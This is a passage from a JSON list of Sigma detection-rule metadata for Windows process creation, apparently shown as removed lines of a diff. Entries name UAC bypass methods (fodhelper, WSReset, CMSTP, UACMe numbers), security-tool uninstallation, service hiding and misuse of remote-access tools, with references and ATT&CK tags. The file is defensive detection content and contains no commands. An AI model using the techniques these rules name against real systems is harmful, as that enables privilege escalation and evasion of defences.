Trust Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", - "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_trust_discovery.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, omkar72", - "level": "medium", - "falsepositive": [ - "Legitimate use of the utilities by legitimate user for legitimate reason" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", - "value": "UAC Bypass Using ChangePK and SLUI", - "meta": { - "refs": [ - "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", - "https://github.com/hfiref0x/UACME", - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "uuid": "b697e69c-746f-4a86-9f59-7bfff8eab881", - "value": "UAC Bypass Using Disk Cleanup", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "uuid": "e66779cc-383e-4224-a3a4-267eeb585c40", - "value": "Bypass UAC via CMSTP", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", - "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_uac_bypass_cmstp.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate use of cmstp.exe utility by legitimate user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "uuid": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", - "value": "UAC Bypass Using Consent and Comctl32 - Process", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", - "uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86", - "value": "UAC Bypass Using DismHost", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "proc_creation_win_uac_bypass_dismhost.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "uuid": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", - "value": "UAC Bypass Using Event Viewer RecentViews", - "meta": { - "refs": [ - "https://twitter.com/orange_8361/status/1518970259868626944", - "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" - ], - "creation_date": "2022/11/22", - "filename": "proc_creation_win_uac_bypass_eventvwr.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "uuid": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "value": "Bypass UAC via Fodhelper.exe", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_uac_bypass_fodhelper.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate use of fodhelper.exe utility by legitimate user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", - "uuid": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", - "value": "UAC Bypass via Windows Firewall Snap-In Hijack", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "uuid": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", - "value": "UAC Bypass via ICMLuaUtil", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2022/09/13", - "filename": "proc_creation_win_uac_bypass_icmluautil.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", - "uuid": "4cbef972-f347-4170-b62a-8253f6168e6d", - "value": "UAC Bypass Using IDiagnostic Profile", - "meta": { - "refs": [ - "https://github.com/Wh04m1001/IDiagnosticProfileUAC", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2022/07/03", - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d", - "value": "UAC Bypass Using IEInstal - Process", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "proc_creation_win_uac_bypass_ieinstal.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "uuid": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "value": "UAC Bypass Using MSConfig Token Modification - Process", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "uuid": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", - "value": "UAC Bypass Using NTFS Reparse Point - Process", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "uuid": "a743ceba-c771-4d75-97eb-8a90f7f4844c", - "value": "UAC Bypass Using PkgMgr and DISM", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "uuid": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "value": "UAC Bypass Abusing Winsat Path Parsing - Process", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/30", - "filename": "proc_creation_win_uac_bypass_winsat.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "uuid": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", - "value": "UAC Bypass Using Windows Media Player - Process", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_uac_bypass_wmp.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "uuid": "d797268e-28a9-49a7-b9a8-2f5039011c5c", - "value": "Bypass UAC via WSReset.exe", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", - "https://www.activecyber.us/activelabs/windows-uac-bypass", - "https://twitter.com/ReaQta/status/1222548288731217921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_uac_bypass_wsreset.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown sub processes of Wsreset.exe" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "value": "UAC Bypass WSReset", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", - "https://github.com/hfiref0x/UACME", - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "uuid": "88656cec-6c3b-487c-82c0-f73ebb805503", - "value": "Use of UltraViewer Remote Access Software", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultraviewer.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/09/25", - "filename": "proc_creation_win_ultraviewer.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", - "uuid": "145322e4-0fd3-486b-81ca-9addc75736d8", - "value": "Use of UltraVNC Remote Access Software", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/10/02", - "filename": "proc_creation_win_ultravnc.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", - "uuid": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "value": "Uninstall Crowdstrike Falcon", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/07/12", - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Uninstall by admin" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion", - "uuid": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "value": "Uninstall Sysinternals Sysmon", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_sysmon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/01/12", - "filename": "proc_creation_win_uninstall_sysmon.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "uuid": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", - "value": "Unusual Child Porcess of dns.exe", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_child_process_of_dns_exe.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_unusual_child_process_of_dns_exe.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious parent process for cmd.exe", - "uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", - "value": "Unusual Parent Process for cmd.exe", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_parent_for_cmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/09/21", - "filename": "proc_creation_win_unusual_parent_for_cmd.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "uuid": "1114e048-b69c-4f41-bc20-657245ae6e3f", - "value": "User Discovery And Export Via Get-ADUser Cmdlet", - "meta": { - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_user_discovery_get_aduser.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "uuid": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "value": "Possible Privilege Escalation via Weak Service Permissions", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://pentestlab.blog/2017/03/30/weak-service-permissions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml", - "author": "Teymur Kheirkhabarov", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", - "uuid": "a537cfc3-4297-4789-92b5-345bfd845ad0", - "value": "Abuse of Service Permissions to Hide Services in Tools", - "meta": { - "refs": [ - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ], - "creation_date": "2021/12/20", - "filename": "proc_creation_win_using_sc_to_hide_sevices.yml", - "author": "Andreas Hunkeler (@Karneades)", - "level": "high", - "falsepositive": [ - "Rare intended use of hidden services" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "uuid": "514e4c3a-c77d-4cde-a00f-046425e2301e", - "value": "Abuse of Service Permissions to Hide Services Via Set-Service", - "meta": { - "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ], - "creation_date": "2022/10/17", - "filename": "proc_creation_win_using_set_service_to_hide_services.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Rare intended use of hidden services" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when verclsid.exe is used to run COM object via GUID", - "uuid": "d06be4b9-8045-428b-a567-740a26d9db25", - "value": "Verclsid.exe Runs COM Object", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", - "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", - "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_verclsid_runs_com.yml", - "author": "Victor Sergeev, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "uuid": "5687f942-867b-4578-ade7-1e341c46e99a", - "value": "VMToolsd Suspicious Child Process", - "meta": { - "refs": [ - "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmtoolsd_susp_child_process.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1059" - ], - "creation_date": "2021/10/08", - "filename": "proc_creation_win_vmtoolsd_susp_child_process.yml", - "author": "behops, Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Legitimate use by administrator" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", - "uuid": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", - "value": "Java Running with Remote Debugging", - "meta": { - "refs": [ - "https://dzone.com/articles/remote-debugging-java-applications-with-jdwp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml" - ], - "tags": [ - "attack.t1203", - "attack.execution" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_vul_java_remote_debugging.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "uuid": "6da2c9f5-7c53-401b-aacb-92c040ce1215", - "value": "Use of W32tm as Timer", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", - "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1124" - ], - "creation_date": "2022/09/25", - "filename": "proc_creation_win_w32tm.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "uuid": "395907ee-96e5-4666-af2e-2ca91688e151", - "value": "Wab Execution From Non Default Location", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], - "creation_date": "2022/08/12", - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", - "uuid": "63d1ccc0-2a43-4f4b-9289-361b308991ff", - "value": "Wab/Wabmig Unusual Parent Or Child Processes", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], - "creation_date": "2022/08/12", - "filename": "proc_creation_win_wab_unusual_parents.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", - "uuid": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", - "value": "Weak or Abused Passwords In CLI", - "meta": { - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", - 